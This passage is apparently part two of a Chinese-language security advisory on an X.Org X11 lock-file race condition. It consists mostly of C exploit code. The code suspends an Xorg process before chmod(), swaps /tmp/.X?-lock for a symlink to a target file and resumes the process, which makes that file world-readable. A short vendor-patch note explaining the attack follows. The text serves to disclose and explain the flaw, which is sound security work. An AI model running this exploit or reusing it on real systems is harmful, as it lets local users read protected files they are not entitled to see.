X.Org X11文件读取权限信息泄露漏洞(2)

/* we must ensure that Xorg is not already running on this display */
  if (stat(lockfile, &st) == 0) {
    printf("[-] %s exists, maybe Xorg is already running on this"
           " display?  Choose another display by editing the DISPLAY"
           " attributes.\n", lockfile);
    return 1;
  }

/* this avoid execution to continue (and automatically switch to another
   * TTY).  Xorg quits with fatal error because the file that /tmp/.X?-lock
   * links does not exist.
   */
  symlink("/dontexist", lockfile);

/* we have to force this mask to not comprise our later checks */
  umask(077);

ttyno = get_tty_number();

printf("[+] Trying to stop a Xorg process right before chmod()\n");
  while (--current_attempt) {
    proc = launch_xorg_instance();

n = 0;
    while (n++ < 10000)
      if ((ret = syscall(SYS_stat, lockfiletmp, &st)) == 0)
    break;

if (ret == 0) {
      syscall(SYS_kill, proc, SIGSTOP);
      printf("[+] Process ID %d stopped (SIGSTOP sent)\n", proc);

stat(lockfiletmp, &st);
      if ((st.st_mode & 4) == 0)
    break;

printf("[-] %s file has wrong rights (%o)\n"
         "[+] removing it by launching another Xorg process\n",
         lockfiletmp, st.st_mode);
      launch_xorg_instance();
      sleep(7);
    }

kill(proc, SIGKILL);
  }

if (current_attempt == 0) {
    printf("[-] Attack failed.\n");

if (!ttyno)
      printf("Try with console ownership: switch to a TTY* by using "
         "Ctrl-Alt-F[1-6] and try again.\n");

return 1;
  }

printf("[+] Removing %s by launching another Xorg process\n",
         lockfiletmp);
  launch_xorg_instance();
  sleep(7);

if (stat(lockfiletmp, &st) == 0) {
    printf("[-] %s lock file still here... :(\n", lockfiletmp);
    return 1;
  }

printf("[+] Creating evil symlink (%s -> %s)\n", lockfiletmp,
         target_file);
  symlink(target_file, lockfiletmp);

printf("[+] Process ID %d resumed (SIGCONT sent)\n", proc);
  kill(proc, SIGCONT);

/* wait for chmod() to finish */
  usleep(300000);

stat(target_file, &st);
  if (!(st.st_mode & 004)) {
    printf("[-] Attack failed, rights are %o.  Try again!\n", st.st_mode);
    return 1;
  }

/* cleaning temporary link */
  unlink(lockfile);

printf("[+] Attack succeeded, ls -l %s:\n", target_file);
  show_target_file(target_file);

return 0;
}

建议:
--------------------------------------------------------------------------------
厂商补丁:

X.org
-----
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载（原文此处的下载链接已缺失，请到 X.Org 官方站点获取对应版本的 X server 更新）。升级之前需要注意：上面给出的利用代码是一个本地攻击——攻击者需要能够启动 Xorg，并能在 /tmp 中把 Xorg 的临时锁文件替换为指向目标文件的符号链接，从而利用 Xorg 处理 /tmp/.X?-lock 锁文件时的竞争条件，使目标文件被 chmod 成全局可读（代码最后检查的正是 st_mode 的 004 位）。
